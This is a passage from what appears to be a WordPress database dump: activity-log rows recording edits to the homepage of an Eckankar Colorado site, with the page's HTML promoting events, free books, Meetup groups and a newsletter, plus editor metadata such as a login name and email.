youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236862,40265,'_message_key','post_updated'),(236863,40265,'_user_id','2'),(236864,40265,'_user_login','S8zhaBda'),(236865,40265,'_user_email','nada@zipnadanot.org'),(236866,40265,'_server_remote_addr','76.130.120.x'),(236867,40265,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236868,40266,'post_id','7160'),(236869,40266,'post_type','page'),(236870,40266,'post_title','Home'),(236871,40266,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2-h-250.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236861,40265,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2-h-250.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: 